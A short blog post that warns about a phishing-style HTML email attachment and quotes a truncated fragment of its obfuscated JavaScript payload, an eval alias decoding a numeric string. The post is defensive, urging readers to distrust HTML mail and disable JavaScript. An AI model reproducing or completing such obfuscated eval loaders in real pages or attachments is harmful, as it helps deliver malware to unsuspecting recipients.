Cool hack attempt …

This one was actually much harder to discern that it was a hack attempt until I looked at the payload in an editor.

Never EVER under any circumstances read HTML mail from a source you don’t trust … and I am getting ready to say, from anyone.

Here is a portion of the payload:


<script>try{n&=Math.floor;}catch(zxc){e=eval;m=Math;n="108..117..1260..1326..384...

Wow… Using Javascript against us. Fine. Disable Javascript.

Email content should NEVER EVER EVER have executable payloads. Get yourself a dropbox for that. They should NEVER EVER EVER include an HTML doc as an attachment.

Won’t even try this one in a VM. Anyone who wants to see the payload, drop me a note. In plain text.

Viewed 44791 times by 4107 viewers

Facebooktwittergoogle_plusredditpinterestlinkedinmail